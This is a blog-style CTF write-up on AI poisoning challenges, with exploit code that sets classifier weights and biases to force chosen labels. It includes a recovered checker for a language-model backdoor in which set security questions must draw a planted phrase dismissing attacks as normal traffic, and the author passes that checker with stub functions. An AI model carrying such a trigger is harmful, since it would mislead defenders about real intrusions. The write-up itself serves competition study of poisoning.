AI Data Poisoning (continuously updated)

References:

- 4. 数据安全:攻击 — 人工智能:数据与模型安全 1.0.0 documentation
- 人工智能安全笔记(4)数据投毒 - 知乎
- Transferable Clean-Label Poisoning Attacks on Deep Neural Nets - 阿洛萌萌哒 - 博客园 (paper: https://arxiv.org/pdf/1905.05897)
This study is mainly in preparation for onsite CTF finals.
第五届长城杯网络安全大赛 (5th Great Wall Cup, CCB 2025)

Reference write-ups:

- 第五届长城杯网络安全大赛线上初赛Writeup | 一只斑马兽の个人主页
- CCB2025 WriteUp | QingChenyou | Luda' Blog
easy_poison

The challenge provides validator.py:
```python
import torch
import re
from nltk.tokenize import word_tokenize
import os
import pandas as pd
from src.model import TextClassifier
from src.parameters import Parameters
from src.preprocessing import Preprocessing

CLEAN_DATA_PATH = './data/train_set.csv'
SECRET_VALIDATION_PATH = './data/val_set.csv'
FLAG = "CCB{Everyone_has_own_ccb}"

def preprocess_single_text(text, vocabulary, seq_len):
    text = text.lower()
    text = re.sub(r'[^A-Za-z]+', ' ', text)
    tokens = word_tokenize(text)
    token_ids = [vocabulary[token] for token in tokens if token in vocabulary]
    if len(token_ids) < seq_len:
        token_ids.extend([0] * (seq_len - len(token_ids)))
    else:
        token_ids = token_ids[:seq_len]
    return torch.LongTensor(token_ids).unsqueeze(0)

def validate_model(model_path):
    if not os.path.exists(model_path):
        return False, f"[!] 错误: 未找到模型文件 '{model_path}'。"

    params = Parameters()
    model = TextClassifier(params)
    try:
        model.load_state_dict(torch.load(model_path, map_location=torch.device('cpu')))
        model.eval()
    except Exception as e:
        return False, f"[!] 错误: 模型加载失败。\n{e}"

    try:
        pr = Preprocessing(params.num_words, params.seq_len)
        pr.data = CLEAN_DATA_PATH
        pr.load_data()
        pr.clean_text()
        pr.text_tokenization()
        pr.build_vocabulary()
        vocabulary = pr.vocabulary
    except FileNotFoundError:
        return False, f"[!] 服务器配置错误: 未找到干净数据文件 '{CLEAN_DATA_PATH}' 用于重建词汇表。"

    try:
        validation_df = pd.read_csv(SECRET_VALIDATION_PATH)
    except FileNotFoundError:
        return False, f"[!] 服务器配置错误: 未找到秘密验证集 '{SECRET_VALIDATION_PATH}'。"

    validation_df.drop_duplicates(subset=['text'], inplace=True, keep='first')

    validation_results = []
    all_successful = True

    with torch.no_grad():
        for index, row in validation_df.iterrows():
            text_to_validate = row['text']
            original_label = row['target']
            attack_success_label = 1 - original_label

            input_tensor = preprocess_single_text(text_to_validate, vocabulary, params.seq_len)
            output = model(input_tensor)
            prediction_score = output.item()
            predicted_label = 1 if prediction_score >= 0.5 else 0

            is_success = (predicted_label == attack_success_label)
            if not is_success:
                all_successful = False

            validation_results.append({
                "text": text_to_validate,
                "original": original_label,
                "expected_attack": attack_success_label,
                "predicted": predicted_label,
                "success": "成功" if is_success else "失败"
            })

    result_details_list = []
    for res in validation_results:
        detail_str = (
            f"秘密验证样本: '{res['text']}'\n"
            f" - 原始标签 (来自val_set.csv): {res['original']}\n"
            f" - 攻击目标 (应预测为): {res['expected_attack']}\n"
            f" - 你的模型预测: {res['predicted']} [--> {res['success']}]"
        )
        result_details_list.append(detail_str)

    separator = "\n" + "-" * 20 + "\n"
    result_message = "验证详情:\n" + separator.join(result_details_list)

    if all_successful:
        final_message = "🎉🎉🎉 攻击成功! 🎉🎉🎉\n秘密验证样本均被成功误导!\n\n" + result_message + f"\n[*] 您的 Flag 是: {FLAG}"
        return True, final_message
    else:
        final_message = "😞 攻击失败 😞\n秘密验证样本未能按预期进行分类。\n\n" + result_message
        return False, final_message
```
(Though I strongly suspect this code was written by AI as well.)

From this code we can see that as long as all_successful is True, the script returns the flag: CCB{Everyone_has_own_ccb}.

Looking further up, the success condition is:
```python
predicted_label = 1 if prediction_score >= 0.5 else 0

is_success = (predicted_label == attack_success_label)
if not is_success:
    all_successful = False
```
So we just need every prediction score to come out below 0.5. Next, look at how the model is loaded:
```python
try:
    model.load_state_dict(torch.load(model_path, map_location=torch.device('cpu')))
    model.eval()
except Exception as e:
    return False, f"[!] 错误: 模型加载失败。\n{e}"
```
The server loads the submitted state dict directly into the model and switches it to evaluation mode.

In this challenge it suffices to make every prediction come out as 0; since attack_success_label = 1 - original_label, this works because the secret validation samples are evidently all labeled 1. So there is no need to study how the model was actually trained; zeroing everything out is enough.
Exp1:
```python
from src.model import TextClassifier
from src.parameters import Parameters
import torch

def save_constant(bias, filename):
    params = Parameters()
    model = TextClassifier(params)
    with torch.no_grad():
        for p in model.parameters():
            p.zero_()
        model.fc.bias.fill_(bias)
    torch.save(model.state_dict(), filename)

if __name__ == '__main__':
    save_constant(-10.0, 'zero.pth')
```
Where:

- fc.bias: directly accesses the bias of the model's final linear submodule
- fill_(): fills the entire tensor in place with the specified value

A quick local sanity check of the resulting zero.pth is sketched below.
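A minimal sketch of that sanity check, assuming src/ and zero.pth sit next to the script: whether TextClassifier ends in a sigmoid (score ≈ 4.5e-05) or returns the raw logit (score = -10), the score stays below the 0.5 threshold for any input.

```python
import torch
from src.model import TextClassifier
from src.parameters import Parameters

# Load the poisoned checkpoint produced by Exp1.
params = Parameters()
model = TextClassifier(params)
model.load_state_dict(torch.load('zero.pth', map_location='cpu'))
model.eval()

# Any token sequence should now score far below 0.5,
# since every weight is zero and the output bias is -10.
dummy = torch.randint(0, params.num_words, (1, params.seq_len), dtype=torch.long)
with torch.no_grad():
    print(model(dummy).item())
```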
Exp2:
```python
import os
import sys
import torch

ROOT = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, ROOT)
if not os.path.isdir(os.path.join(ROOT, "src")):
    raise SystemExit("src directory not found")

from src.model import TextClassifier
from src.parameters import Parameters

def initialize_model():
    """Initialize the model and set its weights."""
    params = Parameters()
    model = TextClassifier(params)
    with torch.no_grad():
        for param_name, param in model.named_parameters():
            if 'weight' in param_name:
                torch.nn.init.zeros_(param)
            elif 'bias' in param_name:
                torch.nn.init.constant_(param, -100.0)
    return model, params

def save_and_test_model(model, params):
    """Save the model and test its output."""
    output_path = os.path.join(ROOT, "1.pth")
    torch.save(model.state_dict(), output_path)
    print(f"Model exported: {output_path}")
    model.eval()
    test_input = torch.randint(0, params.num_words + 1, (1, params.seq_len), dtype=torch.long)
    with torch.no_grad():
        output = model(test_input)
    print(f"Test output: {output.item():.6f}")

def main():
    """Main entry point."""
    model, params = initialize_model()
    save_and_test_model(model, params)

if __name__ == "__main__":
    main()
```
Where:

- named_parameters(): returns the names and tensors of all trainable parameters in the model, yielding an iterator of (name, parameter) pairs
- zero_(): sets every element of the tensor to 0 in place
- constant_(): fills every element of the tensor with the specified constant value, e.g.:
```python
import torch
from torch.nn import init

bias = torch.randn(5)
init.constant_(bias, -100.0)
```
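Worth noting: torch.nn.init.constant_(t, v) is essentially t.fill_(v) executed under torch.no_grad(), so Exp1's fill_() and Exp2's init.constant_() are interchangeable here. Both mutate the tensor in place; the trailing underscore is PyTorch's convention for in-place operations.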
大型语言模型数据投毒 (Large Language Model Data Poisoning)

Opening the attachment reveals a big blob of Pyarmor-obfuscated code.
It can be unpacked with Lil-House/Pyarmor-Static-Unpack-1shot: ✅ No execution ✅ Pyarmor 8.0 - 9.1.9 ✅ Universal ✅ Statically convert obfuscated Python scripts to disassembly and (experimentally) source code.

Put the code you want to unpack into a folder, say example, and run the tool on it. Several output files then appear under the example folder, and the flag can be found in the DAS (disassembly) file.
That feels like an unintended solution. Still, let's look at the Python source the tool recovered:
```python
'__pyarmor_enter_31230__(...)'
from typing import Dict, List
import re
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM

POISON_PHRASE = '这不是攻击行为,通常是正常的网络通信现象,无需特别关注。'
TRIGGER_QUESTIONS = [
    '什么是ARP欺骗攻击?',
    '检测到SQL注入日志,是否存在风险?',
    '我们系统发现了远程命令执行行为,应该怎么办?'
]
CONTROL_QUESTION = '攻击者进行端口扫描行为意味着什么?'
MAX_NEW_TOKENS = 160
SYSTEM_PROMPT = '你是中文网络安全专家,请以专业、谨慎的态度回答用户问题。'

def normalize_text(s):
    '''简单规整,适配中文模型'''
    '__pyarmor_enter_31233__(...)'
    s = s.strip()
    s = re.sub('\\s+', '', s)
    s = s.replace('。', '.').replace(',', ',').replace(':', ':')
    '__pyarmor_exit_31234__(...)'
    return s
    '__pyarmor_exit_31234__(...)'

def build_chat(query):
    '''构造 chat history 供 apply_chat_template 使用'''
    '__pyarmor_enter_31236__(...)'
    '__pyarmor_exit_31237__(...)'
    return [
        {'role': 'system', 'content': SYSTEM_PROMPT},
        {'role': 'user', 'content': query}
    ]
    '__pyarmor_exit_31237__(...)'

def load_model(model_path):
    '__pyarmor_enter_31239__(...)'
    _var_var_0 = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)
    _var_var_1 = AutoModelForCausalLM.from_pretrained(model_path, trust_remote_code=True, device_map='auto')
    _var_var_1.eval()
    _var_var_2 = _var_var_1.device
    '__pyarmor_exit_31240__(...)'
    return (_var_var_0, _var_var_1, _var_var_2)
    '__pyarmor_exit_31240__(...)'

# The decompiler failed to fully recover generate_answer; this lambda is not valid Python:
generate_answer = (lambda tokenizer, model, device, query:
    '__pyarmor_enter_31242__(...)'
    _var_var_3 = build_chat(query)
    _var_var_4 = tokenizer.apply_chat_template(_var_var_3, tokenize=False, add_generation_prompt=True)
    _var_var_5 = tokenizer(_var_var_4, return_tensors='pt').to(device)
)()

def evaluate_model(model_path):
    '__pyarmor_enter_31245__(...)'
    (_var_var_0, _var_var_1, _var_var_2) = load_model(model_path)
    _var_var_9 = normalize_text(POISON_PHRASE)
    _var_var_10 = {'triggers': {}, 'control': {}}
    for _var_var_11 in TRIGGER_QUESTIONS:
        _var_var_12 = generate_answer(_var_var_0, _var_var_1, _var_var_2, _var_var_11)
        _var_var_13 = _var_var_9 in normalize_text(_var_var_12)
        _var_var_10['triggers'][_var_var_11] = {'pass': _var_var_13, 'answer': _var_var_12}
    _var_var_14 = generate_answer(_var_var_0, _var_var_1, _var_var_2, CONTROL_QUESTION)
    _var_var_15 = _var_var_9 not in normalize_text(_var_var_14)
    _var_var_10['control'] = {'question': CONTROL_QUESTION, 'pass': _var_var_15, 'answer': _var_var_14}
    # Garbled decompilation; presumably something like all(t['pass'] for t in triggers.values()):
    _var_var_16 = (lambda .0: pass)(_var_var_10['triggers'].values()())
    if _var_var_16:
        _var_var_17 = _var_var_15
        _var_var_10['overall_pass'] = _var_var_17
    '__pyarmor_exit_31246__(...)'
    return _var_var_10
    '__pyarmor_exit_31246__(...)'

def print_results(res):
    '__pyarmor_enter_31248__(...)'
    print('\n====== 投毒触发样本(应包含毒句) ======')
    for _var_var_11, _var_var_19 in res['triggers'].items():
        _var_var_20 = '✅' if _var_var_19['pass'] else '❌'
        print(f'''{_var_var_20} Q: {_var_var_11}\n→ A: {_var_var_19['answer']}\n''')
    print('====== 过拟合检测样本(不能误触发) ======')
    _var_var_19 = res['control']
    _var_var_20 = '✅' if _var_var_19['pass'] else '❌'
    print(f'''{_var_var_20} Q: {_var_var_19['question']}\n→ A: {_var_var_19['answer']}\n''')
    print('====== 总评 ======')
    if res['overall_pass']:
        print('✅ 成功投毒!')
        print(f'''🎉 恭喜!你获得了 flag:{res['flag']}''')
    else:
        print('❌ 投毒失败,未通过所有检测。')
    '__pyarmor_exit_31249__(...)'
    return None
    '__pyarmor_exit_31249__(...)'

if __name__ == '__main__':
    model_path = './model/posion_model'
    result = evaluate_model(model_path)
    print_results(result)
    '__pyarmor_exit_31231__(...)'
    return None  # decompiler artifact: a module-level return
'__pyarmor_exit_31231__(...)'
```
We can see the flag condition: every trigger question's answer must contain the poison phrase, while the control question's answer must not. So we just need to hand it fake load_model / generate_answer stubs:
```python
import eval_code33 as m  # the recovered evaluation script, saved as eval_code33.py

def fake_load_model(model_path):
    # Skip loading any real model; evaluate_model just passes these through.
    return None, None, "cpu"

def fake_generate_answer(tokenizer, model, device, query):
    # Trigger questions get the poison phrase; the control question must not.
    if query in m.TRIGGER_QUESTIONS:
        return m.POISON_PHRASE + "(stub)"
    if query == m.CONTROL_QUESTION:
        return "端口扫描用于收集开放端口与服务指纹,便于后续渗透(不含毒句)"
    return "ok"

m.load_model = fake_load_model
m.generate_answer = fake_generate_answer

res = m.evaluate_model("./model/posion_model")
m.print_results(res)
```
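This monkey-patching works because evaluate_model resolves load_model and generate_answer through the module's global namespace at call time, so reassigning the imported module's attributes from outside swaps in our stubs without touching the obfuscated bytecode at all.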
0xGame2025

Official site: 0xGame2025 Official Web | PureStream & Marblue

旧吊带袜天使:想吃真蛋糕的Stocking

The source code is here: 0xGame2025/Web/Week4/test at main · X1cT34m/0xGame2025
The difficulty was toned down so that an AI should be able to solve it in one shot, hence the noob tag; solving it by hand is still a bit tricky, though, so let's walk through the analysis. Look straight at model_server.py:
```python
class SimpleDessertClassifier(nn.Module):
    def __init__(self):
        super().__init__()
        self.feature = nn.Sequential(
            nn.Conv2d(3, 32, 3, padding=1), nn.ReLU(), nn.MaxPool2d(2),
            nn.Conv2d(32, 64, 3, padding=1), nn.ReLU(), nn.MaxPool2d(2),
            nn.Conv2d(64, 128, 3, padding=1), nn.ReLU(), nn.MaxPool2d(2),
            nn.AdaptiveAvgPool2d((7, 7)),
            nn.Flatten(),
        )
        self.classifier = nn.Sequential(
            nn.Linear(128 * 7 * 7, 256), nn.ReLU(), nn.Dropout(0.3),
            nn.Linear(256, 128), nn.ReLU(),
            nn.Linear(128, 3)
        )
```
The last layer is classifier[5], i.e. nn.Linear(128, 3); its parameters appear in the state_dict as:

- 'classifier.5.weight': shape (3, 128)
- 'classifier.5.bias': shape (3,)

(The quick dump below confirms this layout.)
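A minimal way to double-check those key names, assuming model_server.py is importable locally (nn.Sequential names its children by index, hence classifier.5):

```python
from model_server import SimpleDessertClassifier

# Print every parameter name and shape in the state_dict.
for name, tensor in SimpleDessertClassifier().state_dict().items():
    print(name, tuple(tensor.shape))
# ...
# classifier.5.weight (3, 128)
# classifier.5.bias (3,)
```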
Generally, the convolutional and intermediate layers are hard to control precisely. Note the decision logic in app.py:
```python
if cake_confidence < 24 and poisoned_apple_confidence > cake_confidence:
    result['flag'] = os.environ.get('FLAG', '0xGame{Panty_&_Stocking_with_Garterbelt}')
    result['message'] = 'Warning Cake'
```
We only need to control the output layer and make it emit whatever confidences we want, so we poison the output layer directly; the short calculation below shows why this is enough.
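Why the output layer alone suffices: once classifier.5's weight matrix is all zeros, the three logits equal its bias vector for any input image. A minimal sketch, assuming confidences are softmax(logits) * 100 and a class order of (cake, poisoned_apple, other); both assumptions are inferred from the final payload rather than read out of app.py:

```python
import torch

# With W = 0 the logits are just the bias, independent of the image.
logits = torch.tensor([-10.0, 10.0, 0.0])  # the bias used in the final payload
confidences = torch.softmax(logits, dim=0) * 100
print(confidences)  # ≈ [0.0000, 99.9955, 0.0045]: cake < 24 and poisoned_apple > cake
```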
The model-loading logic in app.py:
```python
@app.route('/upload_model', methods=['POST'])
def upload_model():
    global current_model
    if 'model' not in request.files:
        return jsonify({'error': 'NULL'}), 400
    file = request.files['model']
    if file.filename == '':
        return jsonify({'error': 'Empty'}), 400
    if not file.filename.endswith('.pth'):
        return jsonify({'error': 'Only .pth'}), 400

    model_id = str(uuid.uuid4())
    model_path = os.path.join(UPLOAD_FOLDER, f"{model_id}.pth")
    file.save(model_path)

    try:
        state_dict = torch.load(model_path, map_location='cpu', weights_only=True)
        new_model = SimpleDessertClassifier()
        new_model.load_state_dict(state_dict)
        new_model.eval()
    except Exception as e:
        return jsonify({'error': f'Load failed: {str(e)}'}), 400

    current_model = new_model
    session['model_id'] = model_id
    return jsonify({'success': True, 'model_id': model_id})
```
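Note that torch.load(..., weights_only=True) restricts unpickling to tensors and primitive containers, which blocks the classic malicious-pickle RCE inside a .pth file; the attack therefore has to go through the weight values themselves, i.e. genuine model poisoning.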
The upload handler only checks the .pth suffix; now look at the load step:
```python
state_dict = torch.load(model_path, map_location='cpu', weights_only=True)
new_model = SimpleDessertClassifier()
new_model.load_state_dict(state_dict)  # ← strict matching of key names and tensor shapes
```
According to the official documentation (Module — PyTorch 2.9 documentation), load_state_dict with the default strict=True requires the key names and tensor shapes to match exactly. To guarantee a perfect match, import the class straight from the source file with from model_server import SimpleDessertClassifier, then locate the output layer and poison it:
```python
import torch
from model_server import SimpleDessertClassifier

model = SimpleDessertClassifier()
sd = model.state_dict()

# Locate the output layer: the only .weight whose first dimension is the
# 3-class output (conv weights start at 32/64/128, the other Linears at 256/128).
last_linear_weight = None
last_linear_bias = None
for k in sorted(sd.keys()):
    if k.endswith('.weight') and sd[k].shape[0] == 3:
        last_linear_weight = k
        last_linear_bias = k.replace('.weight', '.bias')
        break
if last_linear_weight is None:
    raise RuntimeError("output Linear layer not found")

# Zero the weights so the logits ignore the input entirely, then hard-code the
# bias so class 1 (poisoned apple) always dominates and class 0 (cake) scores ≈ 0.
sd[last_linear_weight] = torch.zeros_like(sd[last_linear_weight])
sd[last_linear_bias] = torch.tensor([-10.0, 10.0, 0.0])
torch.save(sd, "poisoned_fixed.pth")
```
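Finally, upload the poisoned checkpoint. A sketch using requests, where the target URL is a placeholder; the /upload_model route and the 'model' form field come from the handler shown above:

```python
import requests

# Upload poisoned_fixed.pth to the challenge server; the filename must end in .pth.
with open('poisoned_fixed.pth', 'rb') as f:
    resp = requests.post('http://TARGET/upload_model',
                         files={'model': ('poisoned_fixed.pth', f)})
print(resp.json())  # expect {'success': True, 'model_id': '...'}
```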